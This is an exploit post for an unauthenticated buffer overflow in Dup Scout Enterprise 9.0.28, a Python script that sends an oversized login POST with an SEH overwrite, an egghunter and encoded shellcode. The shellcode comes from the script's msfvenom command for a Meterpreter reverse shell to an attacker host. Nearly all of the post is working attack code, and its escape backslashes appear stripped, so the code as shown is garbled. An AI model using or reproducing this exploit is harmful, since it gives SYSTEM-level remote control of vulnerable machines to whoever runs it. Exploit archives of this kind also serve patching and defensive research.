Dup Scout Enterprise 9.0.28 Buffer Overflow
Posted on 06 October 2016
#!/usr/bin/python print "Dup Scout Enterprise 9.0.28 Buffer Overflow Exploit" print "Author: Tulpa / tulpa[at]tulpa-security[dot]com" #Author website: www.tulpa-security.com #Author twitter: @tulpa_security #Exploit will land you NT AUTHORITYSYSTEM #You do not need to be authenticated, password below is garbage #Swop out IP, shellcode and remember to adjust 'x41' for bytes #Tested on Windows 7 x86 Enterprise SP1 #Shout-out to carbonated and ozzie_offsec import socket import sys s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) connect=s.connect(('192.168.123.132',80)) #bad chars x00x0ax0dx26 #msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.123.128 LPORT=4444 -e x86/shikata_ga_nai -b 'x00x0ax0dx26' -f python --smallest #payload size 308 buf = "" buf += "xdaxd9xbax43x1bx3fx40xd9x74x24xf4x58x2b" buf += "xc9xb1x47x31x50x18x03x50x18x83xc0x47xf9" buf += "xcaxbcxafx7fx34x3dx2fxe0xbcxd8x1ex20xda" buf += "xa9x30x90xa8xfcxbcx5bxfcx14x37x29x29x1a" buf += "xf0x84x0fx15x01xb4x6cx34x81xc7xa0x96xb8" buf += "x07xb5xd7xfdx7ax34x85x56xf0xebx3axd3x4c" buf += "x30xb0xafx41x30x25x67x63x11xf8xfcx3axb1" buf += "xfaxd1x36xf8xe4x36x72xb2x9fx8cx08x45x76" buf += "xddxf1xeaxb7xd2x03xf2xf0xd4xfbx81x08x27" buf += "x81x91xcex5ax5dx17xd5xfcx16x8fx31xfdxfb" buf += "x56xb1xf1xb0x1dx9dx15x46xf1x95x21xc3xf4" buf += "x79xa0x97xd2x5dxe9x4cx7axc7x57x22x83x17" buf += "x38x9bx21x53xd4xc8x5bx3exb0x3dx56xc1x40" buf += "x2axe1xb2x72xf5x59x5dx3ex7ex44x9ax41x55" buf += "x30x34xbcx56x41x1cx7ax02x11x36xabx2bxfa" buf += "xc6x54xfex97xc3xc2xc1xc0xb7x92xaax12x48" buf += "x83x76x9axaexf3xd6xccx7exb3x86xacx2ex5b" buf += "xcdx22x10x7bxeexe8x39x11x01x45x11x8dxb8" buf += "xccxe9x2cx44xdbx97x6excexe8x68x20x27x84" buf += "x7axd4xc7xd3x21x72xd7xc9x4cx7ax4dxf6xc6" buf += "x2dxf9xf4x3fx19xa6x07x6ax12x6fx92xd5x4c" buf += "x90x72xd6x8cxc6x18xd6xe4xbex78x85x11xc1" buf += "x54xb9x8ax54x57xe8x7fxfex3fx16xa6xc8x9f" buf += "xe9x8dxc8xdcx3fxebxbex0cxfc" #pop pop ret 1006cd33 nseh = "x90x90xEBx0B" seh = "x33xcdx06x10" egghunter = "x66x81xcaxffx0fx42x52x6ax02x58xcdx2ex3cx05x5ax74" egghunter += "xefxb8x77x30x30x74x8bxfaxafx75xeaxafx75xe7xffxe7" evil = "POST /login HTTP/1.1 " evil += "Host: 192.168.123.132 " evil += "User-Agent: Mozilla/5.0 " evil += "Connection: close " evil += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 " evil += "Accept-Language: en-us,en;q=0.5 " evil += "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 " evil += "Keep-Alive: 300 " evil += "Proxy-Connection: keep-alive " evil += "Content-Type: application/x-www-form-urlencoded " evil += "Content-Length: 17000 " evil += "username=admin" evil += "&password=aaaaa " evil += "x41" * 12292 #subtract/add for payload evil += "w00tw00t" evil += "x90" * 20 evil += buf evil += "x90" * 50 evil += "x42" * 1614 evil += nseh evil += seh evil += "x90" * 20 evil += egghunter evil += "x90" * 7000 print 'Sending evil buffer...' s.send(evil) print 'Payload Sent!' s.close()
